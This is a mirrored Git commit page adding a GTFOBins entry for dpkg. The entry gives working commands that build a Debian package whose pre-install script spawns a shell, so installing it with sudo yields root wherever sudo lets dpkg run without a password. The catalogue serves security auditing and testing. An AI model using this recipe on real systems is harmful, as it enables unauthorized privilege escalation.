mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add dpkg thanks to https://lsdsecurity.com/2019/01/linux-privilege-escalation-using-apt-get-apt-dpkg-to-abuse-sudo-nopasswd-misconfiguration/ as in #51
This commit is contained in:
parent
3166a321c0
commit
7a3ae6e05a
12
_gtfobins/dpkg.md
Normal file
12
_gtfobins/dpkg.md
Normal file
@ -0,0 +1,12 @@
|
||||
---
|
||||
functions:
|
||||
sudo:
|
||||
- description: |
|
||||
It runs an interactive shell using a specially crafted Debian package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.
|
||||
```
|
||||
TF=$(mktemp -d)
|
||||
echo 'exec /bin/sh' > $TF/x.sh
|
||||
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
|
||||
```
|
||||
code: sudo dpkg -i x_1.0_all.deb
|
||||
---
|
Loading…
Reference in New Issue
Block a user